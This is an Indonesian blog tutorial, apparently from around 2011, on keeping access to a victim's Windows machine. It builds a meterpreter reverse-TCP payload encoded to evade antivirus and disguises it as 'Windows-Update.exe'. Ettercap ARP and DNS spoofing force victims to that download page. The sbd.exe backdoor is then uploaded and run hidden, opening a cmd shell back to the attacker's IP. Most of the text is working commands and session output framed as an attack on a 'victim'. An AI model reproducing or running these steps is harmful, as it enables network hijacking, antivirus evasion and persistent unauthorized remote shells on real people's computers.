Setelah  banyak mempelajari tentang gaining access dengan metasploit melalui  berbagai, cara. Sekarang saatnya maintain access dengan backdoor yang  kemudian dieksekusi oleh wine.
Preparation:
1. Metasploit dapat diperoleh di sini
2. Ettercap-ng suite dapat diperoleh di sini
3. Wine dapat diperoleh di sini
4. Trojan Backdoor sbd.exe dapat ditemukan di backtrack, pada direktory: /pentest/windows-binary/tools/
Briefing:
1. Buat payload yang dienkoding dengan shikata_ga_nai untuk melewati antivirus.
2. Paksa korban mendownload payload kemudian mengeksekusinya.
3. Upload Trojan sbd.exe ke korban
4. Jalankan sbd.exe untuk masuk ke command prompt milik korban
Tutorial:
1. Buat payload yang dienkoding dengan shikata_ga_nai untuk melewati anti-virus
root@red-dragon:/#  msfpayload /windows/meterpreter/reverse_tcp LHOST=192.168.1.6  LPORT=4444 -e shikata_ga_nai -i 4 X > /var/www/Windows-Update.exe
  
Keterangan:
 a. LHOST adalah IP address anda
 b. LPORT adalah PORT sesi meterpreter anda [default = 4444]
2. Edit file /var/www/index.html
root@red-dragon:/# gedit /var/www/index.html
  
Menjadi:
 
 
Save file tersebut, kemudian jalankan service HTTPD Apache2. Backtrack > Service > HTTPD > start apache
 
3. Edit file /usr/share/ettercap/etter.dns
root@red-dragon:/# gedit /usr/share/ettercap/etter.dns
  
Menjadi:
* A 192.168.1.6
Keterangan: 192.168.1.6 adalah IP address anda
Save  file tersebut, dan jalankan dns_spoof untuk mengalihkan setiap halaman  yang korban tuju, menjadi index.html yang kita buat tadi.
root@red-dragon:/# ettercap -i wlan0 -T -q -P dns_spoof -M ARP /192.168.1.1/ /192.168.1.3/
  
Ini yang akan terjadi pada komputer korban =)
 
    
  
Apapun  web address yang korban ketik, ia akan selalu kembali ke halaman ini.  MEnunggu sampai korban frustasi, kita akan melakukan pengaturan  Metasploit.
  
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp 
msf exploit(handler) > set LHOST 192.168.1.6
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit-j
[*] Started reverse handler on 192.168.1.6:444 
 [*] Starting the payload handler...
   
Ketika korban mendownload file Windows-Update.exe dan menjalankan file tersebut, kita akan memasuki meterpreter sesi pertama
 
[*] Sending stage (749056 bytes) to 192.168.56.50
 [*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.3:1908) at Tue Oct 25 17:41:33 2011
   
 
 
 
4. Upload Trojan Backdoor ke korban
 
meterpreter > upload /pentest/windows-binaries/tools/sbd.exe C:/
[*] uploading : /pentest/windows-binaries/tools/sbd.exe -> C:/
[*] uploaded  : /pentest/windows-binaries/tools/sbd.exe -> D:/\sbd.exe
   
Kemudian, eksekusi Trojan Backdoor dengan melakukan sedikit konfigurasi
 
meterpreter > execute -H -f "C:/sbd.exe -q -r 10 -k reddragon -e cmd -p 1809 192.168.1.6"
Process 728 created.
   
  
  
Keterangan:
 a. reddragon dapat diganti menjadi apapun sesuka anda
 b. 1809 dapat diganti menjadi angka berapapun sesuka anda
 c. 192.168.1.6 adalah IP address anda
 
5. Jalankan sbd.exe dengan wine
root@red-dragon:/# wine /pentest/windows-binaries/tools/sbd.exe -l -k reddragon -p 1809
  
Keterangan:
 a. reddragon harus sesuai dengan nama yang anda input di tahap 4
 b. 1809 harus sesuai dengan angka yang anda input di tahap 4
Selamat mencoba . . :D
 
0 komentar:
Posting Komentar